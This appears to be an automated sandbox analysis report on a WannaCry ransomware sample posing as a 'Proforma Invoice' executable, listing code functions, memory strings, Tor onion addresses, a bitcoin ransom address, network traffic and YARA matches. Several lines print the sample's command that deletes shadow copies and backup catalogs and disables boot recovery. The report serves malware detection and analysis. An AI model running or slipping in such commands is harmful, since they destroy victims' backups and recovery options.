            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE54800 RC2_decrypt,__stack_chk_fail,RC2_cbc_encrypt,RC2_decrypt,86_2_6CE54800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66800 CRYPTO_ccm128_decrypt,86_2_6CE66800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6E800 bn_dup_expand,CRYPTO_malloc,ERR_put_error,CRYPTO_free,86_2_6CE6E800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF32800 b2i_PublicKey_bio,BIO_read,ERR_put_error,CRYPTO_malloc,BIO_read,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CF32800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF489F0 X509V3_EXT_i2d,X509V3_EXT_get_nid,ASN1_item_i2d,ASN1_STRING_type_new,X509_EXTENSION_create_by_NID,ASN1_STRING_free,CRYPTO_malloc,ERR_put_error,ERR_put_error,__stack_chk_fail,X509V3_EXT_add_nconf_sk,NCONF_get_section,__stack_chk_fail,X509V3_EXT_add_nconf,NCONF_get_section,sk_value,X509V3_EXT_nconf,sk_num,__stack_chk_fail,X509V3_EXT_CRL_add_nconf,NCONF_get_section,sk_value,X509V3_EXT_nconf,sk_num,__stack_chk_fail,X509V3_EXT_REQ_add_nconf,NCONF_get_section,__stack_chk_fail,X509V3_get_string,ERR_put_error,__stack_chk_fail,86_2_6CF489F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEB89E0 ECDH_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CEB89E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF369C0 X509_REQ_add_extensions,ASN1_TYPE_new,ASN1_STRING_new,X509_EXTENSIONS_it,ASN1_item_i2d,X509_ATTRIBUTE_new,sk_new_null,sk_push,X509_ATTRIBUTE_free,ASN1_TYPE_free,OBJ_nid2obj,sk_push,sk_new_null,__stack_chk_fail,X509_REQ_get_attr_count,__stack_chk_fail,X509_REQ_get_attr_by_NID,__stack_chk_fail,X509_REQ_get_attr_by_OBJ,__stack_chk_fail,X509_REQ_get_attr,__stack_chk_fail,X509_REQ_delete_attr,__stack_chk_fail,X509_REQ_add1_attr,X509at_add1_attr,__stack_chk_fail,X509_REQ_add1_attr_by_OBJ,X509at_add1_attr_by_OBJ,__stack_chk_fail,X509_REQ_add1_attr_by_NID,X509at_add1_attr_by_NID,__stack_chk_fail,X509_REQ_add1_attr_by_txt,X509at_add1_attr_by_txt,__stack_chk_fail,NETSCAPE_SPKI_set_pubkey,__stack_chk_fail,NETSCAPE_SPKI_get_pubkey,__stack_chk_fail,NETSCAPE_SPKI_b64_decode,CRYPTO_malloc,strlen,ERR_put_error,__stack_chk_fail,NETSCAPE_SPKI_b64_encode,i2d_NETSCAPE_SPKI,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,__stack_chk_fail,X509_CRL_get_ext_by_NID,X509_CRL_get_ext_by_NID,86_2_6CF369C0
            Source: taskhsvc.exe, 00000056.00000003.2524836000.00000000036CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN RSA PUBLIC KEY----- memstr_e4063b3d-e
            Source: unknown HTTPS traffic detected: 77.73.69.128:443 -> 192.168.2.16:49732 version: TLS 1.2
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Code function: 10_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,10_2_10002300
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Code function: 10_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,10_2_10004A40
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDAA18.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDAA17.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\~SDAA16.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\~SD34E5.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SDAA19.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SDAA1A.tmp

            Networking

            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3009777131.0000000002595000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3002673814.0000000000198000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3002671502.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
            Source: unknown TCP traffic detected without corresponding DNS query: 80.127.137.19
            Source: unknown TCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknown TCP traffic detected without corresponding DNS query: 78.142.142.246
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
            Source: taskhsvc.exe, 00000056.00000002.3014680639.0000000003670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 
0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smail
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 
0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
            Source: taskhsvc.exe, 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmp, taskhsvc.exe, 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmp, libeay32.dll.59.dr, ssleay32.dll.59.dr String found in binary or memory: http://www.openssl.org/V
            Source: taskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.dr String found in binary or memory: http://www.openssl.org/support/faq.html
            Source: taskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.dr String found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2425567276.0000000002711000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmp String found in binary or memory: http://www.zlib.net/D
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3002671502.000000000019B000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3002673814.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: taskhsvc.exe, 00000056.00000002.3014680639.0000000003670000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2537858182.0000000004358000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2511720269.000000000482F000.00000004.00000020.00020000.00000000.sdmp, cached-microdesc-consensus.tmp.86.dr String found in binary or memory: https://sabotage.net
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://trac.torproject.org/8742
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, 
@WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000066.00000002.2451103005.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.2453610363.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.google.com/search?q=how
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://www.torproject.org/
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
            Source: tor.exe.59.dr String found in binary or memory: https://www.torproject.org/documentation.html
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://www.torproject.org/download/download#warning
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.dr String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknown HTTPS traffic detected: 77.73.69.128:443 -> 192.168.2.16:49732 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Code function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!10_2_10001960
            Source: Yara match File source: Process Memory Space: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 3796, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: @WanaDecryptor@.exe PID: 6568, type: MEMORYSTR
            Source: Yara match File source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara match File source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\Desktop\u.wnry, type: DROPPED
            Source: Yara match File source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPED
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
            Source: @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
